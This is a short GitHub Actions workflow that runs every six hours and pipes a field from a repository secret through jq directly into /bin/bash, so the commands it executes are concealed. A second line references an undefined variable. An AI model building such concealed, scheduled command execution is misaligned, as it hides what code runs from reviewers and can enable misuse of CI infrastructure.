name: nongjichang3456

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongjichang3456
        env:
          isec2: ${{ secrets.isec2 }}
        run: |
          echo $isec2 | jq -r .kjjaz382 | /bin/bash
          echo $zxdp0 | jq -r .ez89803 | /bin/bash

